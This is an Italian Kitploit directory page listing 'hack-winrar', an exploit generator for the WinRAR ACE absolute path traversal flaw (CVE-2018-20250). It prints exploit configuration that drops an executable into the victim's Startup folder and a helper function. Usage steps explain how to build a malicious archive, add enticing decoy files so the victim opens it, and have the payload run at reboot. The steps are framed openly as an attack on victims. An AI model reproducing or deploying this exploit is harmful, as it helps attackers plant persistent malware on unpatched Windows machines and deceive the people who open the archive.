Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
hack-winrar — WinRar è un software molto conosciuto per Windows. Una versione precedente di WinRaR presentava una vulnerabilità che è stata corretta a Febbraio 2019. La maggior parte delle persone non ha aggiornato winrar, quindi sono vulnerabili a questo bug di attraversamento del percorso assoluto [CVE-2018-20250] | Kitploit
Strumenti/GitHubGitHub/technicaldada/hack-winrar
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubtechnicaldada/hack-winrar

hack-winrar

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Sito web
167 anni faNon ancora revisionato

Informazioni

WinRar è un software molto conosciuto per Windows. Una versione precedente di WinRaR presentava una vulnerabilità che è stata corretta a Febbraio 2019. La maggior parte delle persone non ha aggiornato winrar, quindi sono vulnerabili a questo bug di attraversamento del percorso assoluto [CVE-2018-20250]

Condividi

hack-winrar

WinRar è un software molto conosciuto per Windows. La versione precedente di WinRaR presentava una vulnerabilità che è stata corretta a Febbraio 2019. La maggior parte delle persone non ha aggiornato WinRar, quindi sono vulnerabili a questo bug di Absolute Path Traversal [CVE-2018-20250]

exploit per Estrarre l'esecuzione di codice da Winrar

poc di Ridter

come si usa ?

ti basta installare python 3.7, preparare un file malevolo da eseguire, impostare i valori desiderati, questo script exploit genererà automaticamente il file di archivio malevolo!

  1. imposta i valori desiderati
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. esegui l'exploit, che genera automaticamente test.rar

  1. se la vittima apre test.rar, vedrà i file hello.txt e world.txt; puoi anche aggiungere più file, file più attraenti.

  1. quando estrae il file, la directory di avvio dell'utente della vittima avrà un file in più chiamato hi.exe, che in realtà è calc.exe. quando riavvia il computer, hi.exe verrà eseguito.

divertiti! :)

Scarica lo strumento